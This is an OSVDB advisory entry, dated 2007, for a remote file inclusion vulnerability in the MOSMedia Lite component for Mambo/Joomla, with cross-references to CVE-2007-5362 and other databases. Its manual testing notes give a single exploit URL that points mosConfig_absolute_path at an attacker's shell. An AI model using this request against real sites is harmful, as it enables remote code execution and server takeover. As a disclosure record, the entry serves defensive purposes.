MOSMedia Lite Component for Mambo / Joomla! purchase.html.php mosConfig_absolute_path Variable Remote File Inclusion

2007-10-08T00:00:00
ID OSVDB:38588
Type osvdb
Reporter OSVDB
Modified 2007-10-08T00:00:00

Description

Manual Testing Notes

http://[target]/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]

References:

Related OSVDB ID: 38586 Related OSVDB ID: 38587 ISS X-Force ID: 37015 CVE-2007-5362 Bugtraq ID: 25960